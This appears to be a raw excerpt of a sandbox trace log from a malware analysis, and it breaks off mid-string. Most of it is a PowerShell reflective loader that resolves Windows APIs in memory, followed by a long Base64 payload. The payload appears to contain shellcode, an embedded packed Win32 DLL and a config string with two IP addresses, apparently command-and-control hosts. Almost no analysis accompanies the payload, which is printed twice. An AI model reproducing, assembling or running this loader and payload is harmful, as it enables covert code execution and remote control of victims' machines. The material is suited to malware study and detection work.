$p=[Convert]::FromBase64String(\"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", lpSrch="{ps_shellcode}") returned 0x0 [0035.928] _itoa (in: _Dest=0x3b04, _Radix=1634624 | out: _Dest=0x3b04) returned="15108" [0035.928] _alloca_probe () returned 0x401aa6 [0035.928] StrStrIA (lpFirst="function gd{Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName(\"ReflectedDelegate\")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(\"InMemoryModule\",$false).DefineType(\"MyDelegateType\",\"Class,Public,Sealed,AnsiClass,AutoClass\",[System.MulticastDelegate]);$TypeBuilder.DefineConstructor(\"RTSpecialName,HideBySig,Public\",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags(\"Runtime,Managed\");$TypeBuilder.DefineMethod(\"Invoke\",\"Public,HideBySig,NewSlot,Virtual\",$ReturnType,$Parameters).SetImplementationFlags(\"Runtime,Managed\");return $TypeBuilder.CreateType();}function ga{Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split(\"\\\\\")[-1].Equals(\"System.dll\")};$UnsafeNativeMethods=$SystemAssembly.GetType(\"Microsoft.Win32.UnsafeNativeMethods\");return $UnsafeNativeMethods.GetMethod(\"GetProcAddress\").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod(\"GetModuleHandle\").Invoke($null,@($Module)))),$Procedure));}[Byte[]] $p=[Convert]::FromBase64String(\"VYvsg+xoamtYamVmiUWYWGpyZolFmlhqbmaJRZxYamVmiUWeWGpsZolFoFhqM2aJRaJYajJmiUWkWGouZolFplhqZGaJRahYamxmiUWqWGaJRaxmiUWuZKEwAAAAx0XAVmlydMdFxHVhbEHHRchsbG9jxkXMAItADFODwAxWx0XQTG9hZMdF1ExpYnLHRdhhcnlBxkXcAMdFsEdldFDHRbRyb2NBx0W4ZGRyZWbHRbxzc8ZFvgCLyFeLCWaDeSwYdSWLcTCNVZgz/yvyjRR+ilQVmDJUfZj2wkF1BkeD/wxy6oP/DHQ5O8h1zotVCItCPItEEHiDZfgAA8KLeCCLcByLWCSLQBgD8gPaA/qJdeiJXeyJReSFwA+EggAAAOsLi1EY68mLXeyLdeiLRfiLDIcPtwRDizSGg2X8AAPKiU30jUXQA/IpRfSLRfyLXfQD2IpEBdA6RB3QdQn/RfyDffwNcuWDffwNdQOJdeCJTfSNTbAzwClN9ItN9IpcBbADyDpcDbB1BkCD+A9y64P4D3UDiXXw/0X4i0X4O0XkcoWNRcBQUv9V8It1CIueQBEAAIHGBBEAAGpAaAAwAAAD3v9zUGoA/9CJRfiFwA+EFgEAAItLVINl9ACL+POkD7dLFI1UGSAzyWY7SwZzM4tKCIsyO852AovOhcl0FYt9CItyDIHHBBEAAAP3i3oEA/jzpA+3Swb/RfSDwig5TfRyzYtwPAPwi46AAAAAg3wBDAB0SY18AQyLDwPIUf9V4IlF5IXAdCuLXwQDXfjrHosDhcB5BQ+3wOsHi034jUQIAlD/deT/VfCJA4PDBIM7AHXdi0X4g8cUgz8AdbuLjqQAAACJTeCLjqAAAACL2CteNAPIg2X0AOs2i1XgOVX0czWNVvjR6nQijXkIiVXwD7cXZoXSdAyB4v8PAAAD0AMRARqDxwL/TfB15AF19APOi3EEhfZ1w4tIPItMCChqAGoB/3UIA8j/0esCM8BfXlvJwhAAU1VWM/ZXOTU4kEAAdQv/FWgwQACjOJBAAIsdDDFAAL04kEAAVf/Tag4z0ln38Yv6R3QZVf/TM9JqGVn38YtEJBSAwmGIFAZGO/dy54tEJBRfxgQGAF5dW8IEAFWL7LgAEAAA6NgJAABTVos1BDFAAFcz2/91EP91CP8VuDBAAIv4hf90SotFEI1IAYoQQITSdfkrwQPHaAAQAABQjYUA8P//UP/Wi0UIK8cDRQxQ/3UUV//W/3UMjYUA8P//UP91CP8VADFAADPbg8QkQ+ukX16Lw1vJwhAAVYvsgexMBAAAVlcz/1dXvgQBAABWjYW0+///UP91CFf/FTgxQACFwA+IqQAAAGo4jUXIV1DHRcQ8AAAA6CEJAACDxAyNhbz9//9QVv8VPDBAAP91CP8VsDBAAFCNhbz9//9Q/xW0MEAAV42FvP3//1CNhbT7//9Q/xVAMEAAhcB0VY2FvP3//4lF1I1FxFDHRchAAAAAx0XYRDNAAP8VpDBAAIXAdBhowCcJAP91/P8VRDBAAP91/P8ViDBAAEeLNYQwQACNhbT7//9Q/9aNhbz9//9Q/9aLx19eycIEAFWL7IPk+IHsxAsAAFNWV7nfAQAAvmgzQACNvCRQBAAA86Uz21OJXCQkpP8VLDFAAOhH9///iUQkEP8VaDBAAKMEi0AAjYQkQAEAAFDo+P3//1Bo6DpAAL59BwAAVo2EJFwEAABQ6Dr+//+NhCRAAQAAUOjS/f//UGj4OkAAVo2EJFwEAABQ6Bn+//+NhCRAAQAAUOix/f//UGgIO0AAVo2EJFwEAABQ6Pj9//+NhCRAAQAAUOiQ/f//UGgYO0AAVo2EJFwEAABQ6Nf9//+NhCRAAQAAUOhv/f//UGgoO0AAVo2EJFwEAABQ6Lb9//9qBGgAMAAAaAQ7AABTiR0wkEAA/xV4MEAAi/CJdCQkO/MPhL8FAABokAAAAI2EJLAAAABTUMeEJLQAAACUAAAA6FAHAACNvgQRAACDxAy+AGFAALkAKgAA86SLfCQkaAABAACNhwQQAABoAGBAAFDHBTCQQAABAAAA/xUEMUAAi0QkML5NF0AAuQAQAADzpIPEDL4EOwAAVomwABAAAOh/9v//iUQkGI14AYoIQDrLdflqBCvHaAAwAACNuH0HAABXU/8VeDBAAFeNjCRUBAAAUVCJRCQY/xUEMUAAg8QM/3QkGGg4O0AAV/90JBjoxPz//2oKjYQkRAEAAFBW/xX8MEAAg8QMjYQkQAEAAFBoSDtAAFf/dCQY6Jn8//+LRCQMjXABighAOst1+SvGUItEJBDo6/X//4lEJDC4YDtAAIlEJCSJRCQUx0QkLGQ7QAA5XCQQdQjHRCQseDtAAI2EJKgAAABQ/xVsMEAAhcAPhCgBAACLhCSsAAAAg+gFvsxAQAB0NEgPhRABAAA5nCSwAAAAD4UDAQAAOVwkEHQNx0QkFJA7QADpmwAAAMdEJBRwPEAA6Y4AAAA5XCQQdBLHRCQUUD1AAMdEJCRIPkAA6xDHRCQUGD9AAMdEJCQAQEAAjUQkGFCNRCQUUFNo0DJAAGjUMkAAaAIAAICJXCQox0QkMAQAAAD/FbwwQAA5XCQQdyv/dCQk6Bf8//+FwHUe/zU0kEAA/xV8MEAAUP81MJBAAFZqAeh39v//g8QUi0QkFGY5GHRVaAQBAACNhCRMAgAAUGgMM0AA/xU4MEAAjYQkSAIAAFD/FawwQACFwHUr/3QkFOi5+///hcB1Hv81NJBAAP8VfDBAAFD/NTCQQABWagHoGfb//4PEFIs1FDBAAFONRCQgUFNoPwEPAFNTU2jcQEAAvwEAAIBXxwUwkEAAAgAAAP/WozSQQACD+AV1IeiR8P//U41EJCBQU2g/AQ8AU1NTaNxAQABX/9ajNJBAADvDD4XrAgAAakCNRCRoU1DHRCRsRAAAAOiFBAAAi0QkPIPEDGoEX4lcJAyJPTCQQACNcAGKCEA6y3X5VyvGaAAwAACNtAAAQAAAVlP/FXgwQACJRCQYO8MPhJUCAAD/dCQwTv90JBjHBTCQQAAFAAAA/3QkLP90JDhoEEFAAFZQ/xX4MEAAg8QcjUQkEFBoPE1AAGoBU2gsTUAA/xUwMUAAozSQQAA7ww+MNQIAAItEJBCLMI1EJAxQaLxKQABT/3QkJMcFMJBAAAYAAAD/FZQwQABQaMRKQAD/dCQk/1YcozSQQAA7ww+M7AEAAMcFMJBAAAcAAAA5XCQMD4TiAAAAagZYagheaNABAABmiXwkNGjYSkAAM/9HV2aJRCQ+U41EJEBQ/3QkMMdEJEzMSkAAiTUwkEAA/xX0MEAAhcAPiJIAAACLRCQMjVACZosIg8ACZjvLdfUrwtH4A8BQ/3QkEFdTU/90JDD/FRgwQACFwHhkagZYU2aJRCQoi0QkIFOJRCRUU41EJDCJRCRcU41EJFhQaD8BDwCNRCREUGaJdCRCx0QkRKhMQADHBTCQQAAJAAAAx0QkZBgAAADHRCRwQAAAAIlcJHSJXCR4/xUgMUAAiXwkIP90JAz/FZAwQADrAzP/R/90JBz/FRwwQAD/dCQc/xUIMEAAOVwkIA+E1QAAAGjkMUAAaNgxQADHBTCQQAAKAAAAiVwkKP8VcDBAAFD/FYAwQAA7w3QHjUwkLFH/0GgEAQAAjYQkTAIAAFBosExAAP8VTDBAAI1EJDhQjUQkZFBTU1NTU1No2EpAAI2EJGwCAABQ/xVQMEAAhcB0Zv90JDyLNYgwQADHBTCQQAALAAAA/9Zq//90JDz/FUQwQABoNJBAAP90JDz/FVQwQABoKI9AAFNX/xVYMEAAO8N0E1DHBTCQQAAMAAAA/9aJfCQg6wv/FXwwQACjNJBAAP90JDj/1otEJBCLCFD/UQhoAIAAAFP/dCQg/xV0MEAAi0QkIF9eW4vlXcNVi+yB7BQBAABTVo1F8DPbUIid7P7///8VnDBAAA+2Rf9QD7ZF/lAPtkX9UA+2RfxQD7ZF+1APtkX6UGgcMkAAaAMBAAC+KI9AAFb/FRAxQABoCItAAI2F7P7//1BoEIxAAGgYjUAAaCCOQABo8ExAAGgAYEAA/xUIMUAAg8RAOJ3s/v//dBONhez+//9Q/xXwMEAAWaMskEAAaAxNQABT6Bzy//9ZWWgEAQAAjYXs/v//UFP/FXAwQABQ/xVcMEAAhcAPhNMAAACNhez+//9oFE1AAFD/FewwQABZWTvDdCeLNTAwQACIGOsLaOgDAAD/FWAwQACNhez+//9Q/9aFwHTo6ZQAAABWM/ZTRlb/FVgwQAA7w3QOUP8ViDBAAGgYTUAA6yboxu7//4XAdA9oIE1AAFboh/H//1lZ6zno3vf//4XAdA9oJE1AAFbob/H//1lZ6zr/NTSQQAD/FXwwQABQ/zUwkEAAaMxAQABW6E3x//+DxBSNhez+//9Q6D/y//9TU1NoAGFAAOjp8v//jYXs/v//UOgm8v//U/8VZDBAAMz/JRgxQAD/JSQxQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ7AAAwNjA0MTQ7ODsxNzguODkuMTU5LjM0LDE3OC44OS4xNTkuMzU7MQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATVpAAAEAAAACAAAA//8AALgAAAAAAAAACgAAAAAAAAAOH7oOALQJzSG4AUzNIVdpbjMyIC5ETEwu